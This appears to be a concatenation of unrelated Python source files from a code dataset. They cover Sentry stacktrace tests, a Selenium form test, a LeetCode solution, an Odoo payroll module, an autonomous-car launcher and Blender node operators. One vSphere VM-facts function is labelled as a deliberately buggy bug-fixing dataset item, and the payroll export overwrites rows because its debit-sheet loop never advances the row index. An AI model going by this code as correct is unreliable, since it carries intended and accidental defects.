@mock.patch('sentry.interfaces.stacktrace.is_newest_frame_first', mock.Mock(return_value=False))\n def test_get_stacktrace_with_filename_and_function(self):\n event = mock.Mock(spec=Event())\n interface = Stacktrace.to_python(\n dict(\n frames=[\n {\n 'filename': 'foo',\n 'function': 'biz'\n }, {\n 'filename': 'bar',\n 'function': 'baz'\n }\n ]\n )\n )\n result = interface.get_stacktrace(event)\n self.assertEquals(\n result,\n 'Stacktrace (most recent call last):\\n\\n File \"foo\", in biz\\n File \"bar\", in baz'\n )\n\n @mock.patch('sentry.interfaces.stacktrace.is_newest_frame_first', mock.Mock(return_value=False))\n def test_get_stacktrace_with_filename_function_lineno_and_context(self):\n event = mock.Mock(spec=Event())\n interface = Stacktrace.to_python(\n dict(\n frames=[\n {\n 'filename': 'foo',\n 'function': 'biz',\n 'lineno': 3,\n 'context_line': ' def foo(r):'\n },\n {\n 'filename': 'bar',\n 'function': 'baz',\n 'lineno': 5,\n 'context_line': ' return None'\n },\n ]\n )\n )\n result = interface.get_stacktrace(event)\n self.assertEquals(\n result,\n 'Stacktrace (most recent call last):\\n\\n File \"foo\", line 3, in biz\\n def foo(r):\\n File \"bar\", line 5, in baz\\n return None'\n )\n\n def test_bad_input(self):\n assert Frame.to_python({\n 'filename': 1,\n }).filename is None\n\n assert Frame.to_python({\n 'filename': 'foo',\n 'abs_path': 1,\n }).abs_path == 'foo'\n\n assert Frame.to_python({\n 'function': 1,\n }).function is None\n\n assert Frame.to_python({\n 'module': 1,\n }).module is None\n\n assert Frame.to_python({\n 'function': '?',\n }).function is None\n\n def test_context_with_nan(self):\n self.assertEquals(\n Frame.to_python({\n 'filename': 'x',\n 'vars': {\n 'x': float('inf')\n },\n }).vars,\n {'x': ''},\n )\n self.assertEquals(\n Frame.to_python({\n 'filename': 'x',\n 'vars': {\n 'x': float('-inf')\n },\n }).vars,\n {'x': '<-inf>'},\n )\n self.assertEquals(\n Frame.to_python({\n 'filename': 'x',\n 'vars': {\n 'x': float('nan')\n },\n }).vars,\n {'x': ''},\n )\n\n def test_address_normalization(self):\n interface = Frame.to_python(\n {\n 'lineno': 1,\n 'filename': 'blah.c',\n 'function': 'main',\n 'instruction_addr': 123456,\n 'symbol_addr': '123450',\n 'image_addr': '0x0',\n }\n )\n assert interface.instruction_addr == '0x1e240'\n assert interface.symbol_addr == '0x1e23a'\n assert interface.image_addr == '0x0'\n\n\nclass SlimFrameDataTest(TestCase):\n def test_under_max(self):\n interface = Stacktrace.to_python({'frames': [{'filename': 'foo'}]})\n slim_frame_data(interface, 4)\n assert len(interface.frames) == 1\n assert not interface.frames_omitted\n\n def test_over_max(self):\n values = []\n for n in range(5):\n values.append(\n {\n 'filename': 'frame %d' % n,\n 'vars': {\n 'foo': 'bar'\n },\n 'context_line': 'b',\n 'pre_context': ['a'],\n 'post_context': ['c'],\n }\n )\n interface = Stacktrace.to_python({'frames': values})\n slim_frame_data(interface, 4)\n\n assert len(interface.frames) == 5\n\n for value, num in zip(interface.frames[:2], range(2)):\n assert value.filename == 'frame %d' % num\n assert value.vars is not None\n assert value.pre_context is not None\n assert value.post_context is not None\n\n for value, num in zip(interface.frames[3:], range(3, 5)):\n assert value.filename == 'frame %d' % num\n assert value.vars is not None\n assert value.pre_context is not None\n assert value.post_context is not None\n\n value = interface.frames[2]\n assert value.filename == 'frame 2'\n assert not value.vars\n assert not value.pre_context\n assert not value.post_context\n\n\ndef test_java_frame_rendering():\n render = functools.partial(render_to_string, 'sentry/partial/frames/java.txt')\n\n # This is the ideal case.\n assert render(\n {\n 'module': 'com.getsentry.example.Example',\n 'function': 'test',\n 'filename': 'Example.java',\n 'lineno': 1,\n }\n ).strip() == 'at com.getsentry.example.Example.test(Example.java:1)'\n\n # Legacy support for frames without filename.\n assert render({\n 'module': 'com.getsentry.example.Example',\n 'function': 'test',\n 'lineno': 1,\n }).strip() == 'at com.getsentry.example.Example.test'\n\n # (This shouldn't happen, but...)\n assert render(\n {\n 'module': 'com.getsentry.example.Example',\n 'function': 'test',\n 'filename': 'foo/bar/Example.java',\n 'lineno': 1,\n }\n ).strip() == 'at com.getsentry.example.Example.test(Example.java:1)'\n\n # Native methods don't have line numbers.\n assert render({\n 'function': 'test',\n 'filename': 'Example.java',\n 'lineno': -2,\n }).strip() == 'at test(Example.java)'\n\n assert render({\n 'function': 'test',\n 'filename': 'Example.java',\n 'lineno': 1,\n }).strip() == 'at test(Example.java:1)'\n","sub_path":"tests/sentry/interfaces/test_stacktrace.py","file_name":"test_stacktrace.py","file_ext":"py","file_size_in_byte":13395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"649413472","text":"import unittest\n\nfrom selenium import webdriver\n\n\ndef fill_form(link):\n browser = webdriver.Chrome()\n browser.get(link)\n\n browser.find_element_by_css_selector(\".first:required\").send_keys(\"Abc\")\n browser.find_element_by_css_selector(\".second:required\").send_keys(\"Def\")\n browser.find_element_by_css_selector(\".third:required\").send_keys(\"abc@mailmail.mail\")\n browser.find_element_by_css_selector(\"button.btn\").click()\n\n return browser.find_element_by_tag_name(\"h1\").text\n\n\nclass TestReg(unittest.TestCase):\n def test_reg1(self):\n self.assertEqual(fill_form(\"http://suninjuly.github.io/registration1.html\"),\n \"Congratulations! You have successfully registered!\", \"registration is failed\")\n\n def test_reg2(self):\n self.assertEqual(fill_form(\"http://suninjuly.github.io/registration2.html\"),\n \"Congratulations! You have successfully registered!\", \"registration is failed\")\n\n\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"Section 3/lesson2_step13_unittest_s1l6s11_reg_all.py","file_name":"lesson2_step13_unittest_s1l6s11_reg_all.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"264236011","text":"# Substring with Concatenation of All Words\n# You are given a string, S, and a list of words, L, that are all of the same length. Find all starting indices of substring(s) in S that is a concatenation of each word in L exactly once and without any intervening characters.\n\n# For example, given:\n# S: \"barfoothefoobarman\"\n# L: [\"foo\", \"bar\"]\n\n# You should return the indices: [0,9].\n# (order does not matter).\n\n\n# Solution: \n# - Brute force is O(len(S) * len(L) * len(L[0])), which is too slow\n# - My Solution:\n# + Use a dict to host the words in L, speed up the word validation operation\n# + Create a seperate iterator to make the code more readable\n# + Using dict instead of set, because there might be duplicate words in L\n# + Maintain a moving window of current matched words, (It's actually a queue)\n\n# Bugs:\n# - A typo \"S\" => \"s\", this polluted the namespace\n# - Forget to clear the words variable at LINE[52]\n\nclass Solution:\n # @param S, a string\n # @param L, a list of string\n # @return a list of integer\n def findSubstring(self, S, L):\n def stringWordify(S, offset, wl):\n wc = (len(S) - offset)//wl\n for i in range(wc):\n yield (offset + i* wl, S[offset + i * wl: offset + i * wl + wl])\n\n if len(S) == 0 or len(L) == 0:\n return []\n wl = len(L[0]) # single word length\n wc = len(L) # total word count\n sl = len(S) # string length\n if wl == 0 or sl < wl * wc:\n return []\n\n dct = {}\n for w in L:\n if not w in dct:\n dct[w] = 0\n dct[w] += 1 \n\n result = []\n for offset in range(wl):\n # Use offset to avoid updating every words in checking\n cache = {}\n words = []\n # Iterate over words with index \n for index, w in stringWordify(S, offset, wl):\n if (not w in dct): \n # start new matching if w is not in L\n cache = {}\n words = []\n else:\n # push the w into cache\n words.append((index,w))\n if not w in cache:\n cache[w] = 0\n cache[w] += 1\n\n if cache == dct:\n # if cache is equal to dct, save the result\n result.append(words[0][0])\n\n # rotate the cache if needed\n if len(words) >= wc or cache[w] > dct[w]:\n index, drop = words[0]\n words = words[1:] if wc > 1 else []\n cache[drop] -= 1\n return result","sub_path":"030_SubstringWithConcatenationOfAllWords/substring_concatenation.py","file_name":"substring_concatenation.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"30346506","text":"import os\nimport sys\nsys.path.append(\".\")\nsys.path.append(\"C:\\\\Users\\\\HEVEN\\\\darknet\\\\build\\\\darknet\\\\x64\")\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\n\nfrom src.Database import Database\nfrom Control.Control import Control\nfrom Path import Path\nfrom Mission import MissionManager, SampleMission, TrafficLightMission, NarrowMission, UturnMission, TargetCarMission, DefaultMission, ParkingMission, CrosswalkMission, DefaultMission2\nfrom YOLO.thread_yolo import YOLO\nimport time\n\n\ndef main():\n db = Database(gps=False, imu=False) \n db.start()\n\n yolo = YOLO(db=db)\n yolo.start()\n \n path = Path(db=db)\n control = Control(db=db, path=path)\n\n # 미션 매니저 생성\n mission_manager = MissionManager(db=db)\n\n # 수행할 미션 순서\n mission_manager.mission_keys =\\\n [\"TrafficLight\", \"Default2\", \"Narrow\", \"U-Turn\",\n \"Target_Car\", \"Default\", \"Parking\",\n \"CrossWalk\"]\n\n # 시작 미션 할당(일반적인 경우 0번째 미션부터 시작)\n mission_manager.mission_idx = 0\n mission_manager.current_mission_key = mission_manager.mission_keys[mission_manager.mission_idx]\n\n # 수행할 미션들을 생성\n trafficlight_mission = TrafficLightMission(db=db, control=control, path=path)\n narrow_mission = NarrowMission(db=db, control=control, path=path)\n uturn_mission = UturnMission(db=db, control=control, path=path)\n target_mission = TargetCarMission(db=db, control=control, path=path)\n default_mission = DefaultMission(db=db, control=control, path=path)\n default_mission2 = DefaultMission2(db=db, control=control, path=path)\n parking_mission = ParkingMission(db=db, control=control, path=path)\n crosswalk_mission = CrosswalkMission(db=db, control=control, path=path)\n \n # 미션 매니저에 수행할 미션들을 추가.\n mission_manager.add_mission(key=\"TrafficLight\", mission=trafficlight_mission)\n mission_manager.add_mission(key=\"Narrow\", mission=narrow_mission)\n mission_manager.add_mission(key=\"U-Turn\", mission=uturn_mission)\n mission_manager.add_mission(key=\"Target_Car\", mission=target_mission)\n mission_manager.add_mission(key=\"Default\", mission=default_mission)\n mission_manager.add_mission(key=\"Default2\", mission=default_mission2)\n mission_manager.add_mission(key=\"Parking\", mission=parking_mission)\n mission_manager.add_mission(key=\"CrossWalk\", mission=crosswalk_mission)\n\n mission_manager.start()\n \n while True:\n if db.flag.system_stop:\n break\n else:\n try:\n print(mission_manager.current_mission_key)\n print(db.mission)\n time.sleep(1)\n except KeyboardInterrupt:\n print(\"Keyboard Interrupt detected!\")\n db.flag.system_stop = True\n break\n \n yolo.join()\n mission_manager.join()\n db.join()\n\n return 0\n\nif __name__ == \"__main__\":\n if main() == 0:\n print(\"\\nAutonomous-Car-System terminated successfully!\")\n else:\n print(\"\\nThere is something wrong. I recommend you to kill every processes which is related to this program.\")\n","sub_path":"PAMS_2019/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"41261861","text":"import xlwt\n\nimport base64\nfrom openerp import models, fields, api\nfrom cStringIO import StringIO\nfrom openerp.addons.hr_payroll_ezra.parameters import constants\n\nPAYROLL_STATE_STATUS = [\n ('draft', 'Draft'),\n ('approved', 'Approved'),\n ('post', 'Paid')\n]\n\n\nclass BankPayrollMain(models.Model):\n _name = 'payroll.bank.template'\n _description = 'Bank Payroll Template'\n _inherit = 'mail.thread'\n\n @api.one\n def legacy_doc1_getFilename(self):\n self.filename = self.name + ' Bank Payroll.xls'\n\n name = fields.Char('Bank Payroll Name', required=True)\n payroll_period = fields.Many2one('hr.payroll.main','Payroll Period')\n\n payroll_month_of = fields.Selection(constants.MONTH_SELECTION, 'for the Month of', required=True)\n payroll_month_quarter = fields.Selection(constants.MONTH_QUARTER_SELECTION,'Month Quarter', required=True)\n payroll_year = fields.Integer('for the Year', default = constants.YEAR_NOW, required=True)\n\n employee_name = fields.Many2one('hr.employee', 'Employee Name')\n total_amount_debit = fields.Float('Total Debit', readonly = True)\n total_amount_check = fields.Float('Total Check', readonly = True)\n total_amount = fields.Float('Grand Total', readonly = True)\n state = fields.Selection(PAYROLL_STATE_STATUS, 'Status', default = 'draft')\n approved_by_id = fields.Many2one('res.users', 'Approver')\n posted_by_id = fields.Many2one('res.users', 'Posted by')\n payroll_bank_main_id = fields.One2many('payroll.bank.template.detail', 'bank_payroll_detail_id', readonly=False, copy=False)\n payroll_bank_main_check_id = fields.One2many('payroll.bank.template.detail.check', 'bank_payroll_detail_id', readonly=False, copy=False)\n\n\n filename = fields.Char('file name', readonly = True,store = False,compute ='legacy_doc1_getFilename')\n payroll_file = fields.Binary('Generate Bank Payroll')\n\n def getUseridName(self):\n return self.env['res.users'].search([('id','=', self._uid)]).name\n\n @api.one\n def generateBank(self):\n self.total_amount = 0\n self.payroll_file = None\n\n bankpayroll_check_detail =self.env['payroll.bank.template.detail.check']\n bank_check_det = bankpayroll_check_detail.search([('bank_payroll_detail_id', '=', self.id)])\n bank_check_det.unlink()\n\n bankpayroll_detail = self.env['payroll.bank.template.detail']\n bank_det = bankpayroll_detail.search([('bank_payroll_detail_id', '=', self.id)])\n bank_det.unlink()\n # For Per Project Assigned Selection\n if len(self.payroll_period) > 0:\n self.total_amount = 0\n self.total_amount_debit = 0\n self.total_amount_check = 0\n for period in self.payroll_period.payroll_main_id:\n if len(period.employee_id.bank_account_id) > 0:\n if isinstance(period.employee_id.bank_account_id.acc_number, bool):\n account_number =\"\"\n else:\n account_number = period.employee_id.bank_account_id.acc_number.replace(\"-\",\"\")\n\n if len(self.employee_name) > 0:\n if self.employee_name == period.employee_id:\n bankpayroll_detail.create(\n {\n 'bank_payroll_detail_id': self.id,\n 'name': period.employee_id.last_name + ', ' + period.employee_id.first_name,\n 'account_number': account_number ,\n 'amount': round(period.net_pay,2)\n })\n self.total_amount += round(period.net_pay,2)\n else:\n bankpayroll_detail.create(\n {\n 'bank_payroll_detail_id': self.id,\n 'name': period.employee_id.last_name + ', ' + period.employee_id.first_name,\n 'account_number': period.employee_id.bank_account_id.acc_number,\n 'amount': round(period.net_pay,2)\n })\n self.total_amount += round(period.net_pay,2)\n else:\n self.total_amount = 0\n self.total_amount_debit = 0\n self.total_amount_check = 0\n payroll_detail = self.env['hr.payroll.detail'].search([('month_half_period', '=', self.payroll_month_quarter),\n ('month_name_period', '=', self.payroll_month_of),\n ('year_payroll_period', '=', self.payroll_year),\n ('payroll_detail_id.state', '=', 'approved')])\n if len(payroll_detail) > 0:\n for employee in payroll_detail:\n if isinstance(employee.employee_id.bank_account_id.acc_number, bool):\n account_number = \"\"\n else:\n account_number = employee.employee_id.bank_account_id.acc_number.replace(\"-\",\"\")\n # Employee Has no Bank Account Number\n if len(employee.employee_id.bank_account_id) > 0:\n if len(self.employee_name) > 0:\n if self.employee_name == employee.employee_id:\n bankpayroll_detail.create(\n {\n 'bank_payroll_detail_id': self.id,\n 'name': employee.employee_id.last_name + ', ' + employee.employee_id.first_name,\n 'account_number': account_number,\n 'amount': round(employee.net_pay,2)\n })\n self.total_amount_debit += round(employee.net_pay,2)\n else:\n bankpayroll_detail.create(\n {\n 'bank_payroll_detail_id': self.id,\n 'name': employee.employee_id.last_name + ', ' + employee.employee_id.first_name,\n 'account_number': account_number,\n 'amount': round(employee.net_pay,2)\n })\n self.total_amount_debit += round(employee.net_pay,2)\n else:\n if len(self.employee_name) > 0:\n if self.employee_name == employee.employee_id:\n bank_check_det.create(\n {\n 'bank_payroll_detail_id': self.id,\n 'name': employee.employee_id.last_name + ', ' + employee.employee_id.first_name,\n 'account_number': \"\",\n 'amount': round(employee.net_pay,2)\n })\n self.total_amount_check += round(employee.net_pay,2)\n else:\n bank_check_det.create(\n {\n 'bank_payroll_detail_id': self.id,\n 'name': employee.employee_id.last_name + ', ' + employee.employee_id.first_name,\n 'account_number': \"\",\n 'amount': round(employee.net_pay,2)\n })\n self.total_amount_check += round(employee.net_pay,2)\n self.total_amount = self.total_amount_debit + self.total_amount_check\n self.generateExcelFile()\n\n @api.one\n def generateExcelFile(self):\n\n #self.total_amount = 0\n self.payroll_file = None\n\n #Creation of Excel File\n workbook = xlwt.Workbook()\n\n #With Account Number\n sheet = workbook.add_sheet(\"Bank Payroll Debit\",True)\n\n bankpayroll_detail = self.env['payroll.bank.template.detail']\n bank_det = bankpayroll_detail.search([('bank_payroll_detail_id', '=', self.id)])\n\n # Create Title\n sheet.write(0, 0, \"Account Number\")\n sheet.write(0, 1, \"Name\")\n sheet.write(0, 2, \"Amount\")\n\n sheet.col(0).width = 8000 # around 220 pixels\n sheet.col(1).width = 8000 # around 220 pixels\n sheet.col(2).width = 8000 # around 220 pixels\n i =1\n for employee in bank_det:\n #sheet.col(i).width = 8000 # around 220 pixels\n sheet.write(i, 0, employee.account_number)\n sheet.write(i, 1, employee.name)\n sheet.write(i, 2, employee.amount)\n\n\n # For Employee With no Account Number\n sheet = workbook.add_sheet(\"Bank Payroll Check\",True)\n\n bankpayroll_detail = self.env['payroll.bank.template.detail.check']\n bank_det = bankpayroll_detail.search([('bank_payroll_detail_id', '=', self.id)])\n\n # Create Title\n #sheet.write(0, 0, \"Account Number\")\n sheet.write(0, 0, \"Name\")\n sheet.write(0, 1, \"Amount\")\n\n sheet.col(0).width = 8000 # around 220 pixels\n sheet.col(1).width = 8000 # around 220 pixels\n sheet.col(2).width = 8000 # around 220 pixels\n i =1\n for employee in bank_det:\n sheet.col(i).width = 8000 # around 220 pixels\n sheet.write(i, 0, employee.name)\n sheet.write(i, 1, employee.amount)\n i +=1\n\n fp = StringIO()\n workbook.save(fp)\n fp.seek(0)\n data = fp.read()\n fp.close()\n byte_arr = base64.b64encode(data)\n self.payroll_file = byte_arr\n\n @api.one\n def postDraft(self):\n message =\"\"\"Bank Payroll\n
Status: Approved->Draft
\n
Re-check by: %(user)s
\n
Type: Rechecking of Bank Payroll
\n \"\"\" %{'user': self.getUseridName()}\n self.message_post(body=message)\n\n self.state = PAYROLL_STATE_STATUS[0][0]\n self.approved_by_id = None\n self.posted_by_id = None\n\n @api.one\n def postApproved(self):\n message =\"\"\"Bank Payroll\n
Status: Draft->Approved
\n
Re-check by: %(user)s
\n
Type: Approve of Bank Payroll
\n \"\"\" %{'user': self.getUseridName()}\n self.message_post(body=message)\n\n self.state = PAYROLL_STATE_STATUS[1][0]\n self.approved_by_id = self._uid\n\n @api.one\n def post(self):\n message =\"\"\"Bank Payroll\n
Status: Approved->Paid
\n
Re-check by: %(user)s
\n
Type: Paid of Bank Payroll
\n \"\"\" %{'user': self.getUseridName()}\n self.message_post(body=message)\n\n self.state = PAYROLL_STATE_STATUS[2][0]\n self.posted_by_id = self._uid\n\nclass BankPayrollDetail(models.Model):\n _name = 'payroll.bank.template.detail'\n _description = 'Bank Payroll Template Detail'\n _order = 'account_number,name'\n\n bank_payroll_detail_id = fields.Many2one('payroll.bank.template')\n name = fields.Char('Name')\n account_number = fields.Char('Account Number')\n amount = fields.Char('Amount')\n\nclass BankPayrollDetail(models.Model):\n _name = 'payroll.bank.template.detail.check'\n _description = 'Bank Payroll Template Detail Check'\n _order = 'account_number,name'\n\n #@api.one\n #def _getTotalAmount(self):\n # total_amount = 0\n # model_payroll_check = self.env['payroll.bank.template.detail.check'].search([('bank_payroll_detail_id', '=', self.bank_payroll_detail_id.id)])\n # for employee_payroll in model_payroll_check:\n # curr_amount = 0\n # if not isinstance(employee_payroll.amount, bool):\n # curr_amount = employee_payroll.amount\n # self.total_amount += curr_amount\n\n bank_payroll_detail_id = fields.Many2one('payroll.bank.template')\n name = fields.Char('Name')\n account_number = fields.Char('Account Number')\n amount = fields.Char('Amount')\n\n #total_amount = fields.Float('Total', digits=(18,2))","sub_path":"openerp/addons/hr_payroll_ezra/bank_payroll/security_bank.py","file_name":"security_bank.py","file_ext":"py","file_size_in_byte":12614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"300200937","text":"def gather_vm_facts(content, vm):\n ' Gather facts from vim.VirtualMachine object. '\n facts = {\n 'module_hw': True,\n 'hw_name': vm.config.name,\n 'hw_power_status': vm.summary.runtime.powerState,\n 'hw_guest_full_name': vm.summary.guest.guestFullName,\n 'hw_guest_id': vm.summary.guest.guestId,\n 'hw_product_uuid': vm.config.uuid,\n 'hw_processor_count': vm.config.hardware.numCPU,\n 'hw_cores_per_socket': vm.config.hardware.numCoresPerSocket,\n 'hw_memtotal_mb': vm.config.hardware.memoryMB,\n 'hw_interfaces': [],\n 'hw_datastores': [],\n 'hw_files': [],\n 'hw_esxi_host': None,\n 'hw_guest_ha_state': None,\n 'hw_is_template': vm.config.template,\n 'hw_folder': None,\n 'hw_version': vm.config.version,\n 'instance_uuid': vm.config.instanceUuid,\n 'guest_tools_status': _get_vm_prop(vm, ('guest', 'toolsRunningStatus')),\n 'guest_tools_version': _get_vm_prop(vm, ('guest', 'toolsVersion')),\n 'guest_question': vm.summary.runtime.question,\n 'guest_consolidation_needed': vm.summary.runtime.consolidationNeeded,\n 'ipv4': None,\n 'ipv6': None,\n 'annotation': vm.config.annotation,\n 'customvalues': {\n \n },\n 'snapshots': [],\n 'current_snapshot': None,\n 'vnc': {\n \n },\n }\n if vm.summary.runtime.host:\n try:\n host = vm.summary.runtime.host\n facts['hw_esxi_host'] = host.summary.config.name\n except vim.fault.NoPermission:\n pass\n if vm.summary.runtime.dasVmProtection:\n facts['hw_guest_ha_state'] = vm.summary.runtime.dasVmProtection.dasProtected\n datastores = vm.datastore\n for ds in datastores:\n facts['hw_datastores'].append(ds.info.name)\n try:\n files = vm.config.files\n layout = vm.layout\n if files:\n facts['hw_files'] = [files.vmPathName]\n for item in layout.snapshot:\n for snap in item.snapshotFile:\n facts['hw_files'].append((files.snapshotDirectory + snap))\n for item in layout.configFile:\n facts['hw_files'].append(((os.path.dirname(files.vmPathName) + '/') + item))\n for item in vm.layout.logFile:\n facts['hw_files'].append((files.logDirectory + item))\n for item in vm.layout.disk:\n for disk in item.diskFile:\n facts['hw_files'].append(disk)\n except Exception:\n pass\n facts['hw_folder'] = PyVmomi.get_vm_path(content, vm)\n cfm = content.customFieldsManager\n for value_obj in vm.summary.customValue:\n kn = value_obj.key\n if ((cfm is not None) and cfm.field):\n for f in cfm.field:\n if (f.key == value_obj.key):\n kn = f.name\n break\n facts['customvalues'][kn] = value_obj.value\n net_dict = {\n \n }\n vmnet = _get_vm_prop(vm, ('guest', 'net'))\n if vmnet:\n for device in vmnet:\n net_dict[device.macAddress] = list(device.ipAddress)\n if vm.guest.ipAddress:\n if (':' in vm.guest.ipAddress):\n facts['ipv6'] = vm.guest.ipAddress\n else:\n facts['ipv4'] = vm.guest.ipAddress\n ethernet_idx = 0\n for entry in vm.config.hardware.device:\n if (not hasattr(entry, 'macAddress')):\n continue\n if entry.macAddress:\n mac_addr = entry.macAddress\n mac_addr_dash = mac_addr.replace(':', '-')\n else:\n mac_addr = mac_addr_dash = None\n if (hasattr(entry, 'backing') and hasattr(entry.backing, 'port') and hasattr(entry.backing.port, 'portKey') and hasattr(entry.backing.port, 'portgroupKey')):\n port_group_key = entry.backing.port.portgroupKey\n port_key = entry.backing.port.portKey\n else:\n port_group_key = None\n port_key = None\n factname = ('hw_eth' + str(ethernet_idx))\n facts[factname] = {\n 'addresstype': entry.addressType,\n 'label': entry.deviceInfo.label,\n 'macaddress': mac_addr,\n 'ipaddresses': net_dict.get(entry.macAddress, None),\n 'macaddress_dash': mac_addr_dash,\n 'summary': entry.deviceInfo.summary,\n 'portgroup_portkey': port_key,\n 'portgroup_key': port_group_key,\n }\n facts['hw_interfaces'].append(('eth' + str(ethernet_idx)))\n ethernet_idx += 1\n snapshot_facts = list_snapshots(vm)\n if ('snapshots' in snapshot_facts):\n facts['snapshots'] = snapshot_facts['snapshots']\n facts['current_snapshot'] = snapshot_facts['current_snapshot']\n facts['vnc'] = get_vnc_extraconfig(vm)\n return facts","sub_path":"Data Set/bug-fixing-5/d37386d2c7f7044860950e3abcec32edff6ef770--bug.py","file_name":"d37386d2c7f7044860950e3abcec32edff6ef770--bug.py","file_ext":"py","file_size_in_byte":4817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"489436200","text":"\"\"\"\n-------------------------------------------------\n File Name: conftest\n Description :\n Author : zws\n date: 2018/3/6\n-------------------------------------------------\n Change Activity:\n 2018/3/6:\n-------------------------------------------------\n\"\"\"\n__author__ = 'zws'\n\nimport pytest\n\nfrom Common.BaseDriver import BaseDriver\nfrom PageObjects.home_page import Home_Page\nfrom PageObjects.login_page import Login_Page\nfrom TestDatas import COMM_DATA as CD\n\n\n@pytest.fixture\ndef init_driver():\n driver = BaseDriver().init_driver()\n yield driver\n\n\n@pytest.fixture\ndef init_add_friend():\n driver = BaseDriver().init_driver()\n home_page = Home_Page(driver)\n login_pag = Login_Page(driver)\n home_page.touch_login()\n login_pag.login_by_password_action(CD.login_username_zws, CD.login_passwd_zws)\n home_page.touch_do_next()\n home_page.touch_home_friend()\n yield driver\n\n@pytest.fixture()\ndef init_register():\n driver = BaseDriver().init_driver()\n home_page = Home_Page(driver)\n home_page.touch_to_sign_up()\n yield driver\n\n\n","sub_path":"TestCases/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"56688683","text":"import os, subprocess\nimport json\nimport bpy\nimport bge_netlogic\nimport bge_netlogic.utilities as utils\nfrom bpy_extras.io_utils import ImportHelper\nimport webbrowser\n\n\nNODE_ATTRS = [\n 'value',\n 'game_object',\n 'default_value',\n 'use_toggle',\n 'use_value',\n 'true_label',\n 'false_label',\n 'value_type',\n 'bool_editor',\n 'int_editor',\n 'float_editor',\n 'string_editor',\n 'radians',\n 'filepath_value',\n 'sound_value',\n 'float_field',\n 'expression_field',\n 'input_type',\n 'value_x',\n 'value_y',\n 'value_z',\n 'title',\n 'local',\n 'operator',\n 'formatted',\n 'pulse',\n 'hide',\n 'label',\n 'ref_index',\n 'use_owner',\n 'advanced'\n]\n\n\nclass TreeCodeWriterOperator(bpy.types.Operator):\n bl_idname = \"bgenetlogic.treecodewriter_operator\"\n bl_label = \"Timed code writer\"\n bl_options = {'REGISTER', 'UNDO'}\n timer = None\n\n def modal(self, context, event):\n if event.type == \"TIMER\":\n bge_netlogic._consume_update_tree_code_queue()\n return {'PASS_THROUGH'}\n\n def execute(self, context):\n if context.window is None:\n utils.warn('Working Window not found, hibernating...')\n bge_netlogic._tree_code_writer_started = False\n return {\"FINISHED\"}\n if context.window_manager is None:\n utils.warn('Window Manager not found, hibernating...')\n bge_netlogic._tree_code_writer_started = False\n return {\"FINISHED\"}\n if self.timer is not None:\n utils.warn('No Timer Set. Hibernating...')\n return {'FINISHED'}\n self.timer = context.window_manager.event_timer_add(\n 1.0,\n window=context.window\n )\n context.window_manager.modal_handler_add(self)\n return {\"RUNNING_MODAL\"}\n\n\nclass WaitForKeyOperator(bpy.types.Operator):\n bl_idname = \"bge_netlogic.waitforkey\"\n bl_label = \"Press a Key\"\n bl_options = {'REGISTER', 'UNDO'}\n keycode: bpy.props.StringProperty()\n\n def __init__(self):\n self.socket = None\n self.node = None\n\n def __del__(self):\n pass\n\n def execute(self, context):\n return {'FINISHED'}\n\n def cleanup(self, context):\n if self.socket.value == \"Press a key...\":\n self.socket.value = \"\"\n self.socket = None\n self.node = None\n try:\n context.region.tag_redraw()\n except Exception:\n utils.warn(\"Couldn't redraw panel, code updated.\")\n\n def modal(self, context, event):\n if event.value == \"PRESS\":\n if (\n event.type == \"LEFTMOUSE\" or\n event.type == \"MIDDLEMOUSE\" or\n event.type == \"RIGHTMOUSE\"\n ):\n self.socket.value = \"Press & Choose\"\n return {'FINISHED'}\n else:\n value = event.type\n if(self.socket):\n self.socket.value = value\n else:\n self.node.value = value\n self.cleanup(context)\n return {'FINISHED'}\n return {'PASS_THROUGH'}\n\n def invoke(self, context, event):\n self.socket = context.socket\n self.node = context.node\n\n if(not self.socket) and (not self.node):\n utils.error(\"No socket or Node\")\n return {'FINISHED'}\n\n if(self.socket):\n self.socket.value = \"Press a key...\"\n\n else:\n self.node.value = \"Press a key...\"\n try:\n context.region.tag_redraw()\n except Exception:\n utils.warn(\"Couldn't redraw panel, code updated.\")\n context.window_manager.modal_handler_add(self)\n return {'RUNNING_MODAL'}\n\n\nclass NLImportProjectNodes(bpy.types.Operator):\n bl_idname = \"bge_netlogic.import_nodes\"\n bl_label = \"Import Logic Nodes\"\n bl_options = {'REGISTER', 'UNDO'}\n filepath: bpy.props.StringProperty(subtype=\"FILE_PATH\")\n\n @classmethod\n def poll(cls, context):\n if not hasattr(context.space_data, 'tree_type'):\n return False\n tree_type = context.space_data.tree_type\n return tree_type == bge_netlogic.ui.BGELogicTree.bl_idname\n\n def _create_directories(self):\n local_bge_netlogic_folder = bpy.path.abspath(\"//bgelogic\")\n if not os.path.exists(local_bge_netlogic_folder):\n os.mkdir(local_bge_netlogic_folder)\n local_cells_folder = bpy.path.abspath(\"//bgelogic/cells\")\n if not os.path.exists(local_cells_folder):\n os.mkdir(local_cells_folder)\n local_nodes_folder = bpy.path.abspath(\"//bgelogic/nodes\")\n if not os.path.exists(local_nodes_folder):\n os.mkdir(local_nodes_folder)\n return local_cells_folder, local_nodes_folder\n\n def _entry_filename(self, p):\n ws = p.rfind(\"\\\\\")\n us = p.rfind(\"/\")\n if us >= 0 and us > ws:\n return p.split(\"/\")[-1]\n if ws >= 0 and ws > us:\n return p.split(\"\\\\\")[-1]\n return p\n\n def _generate_unique_filename(self, output_dir, file_name):\n dot_index = file_name.rfind(\".\")\n name_part = file_name[:dot_index]\n ext_part = file_name[dot_index + 1:]\n path = os.path.join(output_dir, file_name)\n index = 0\n while os.path.exists(path):\n name = 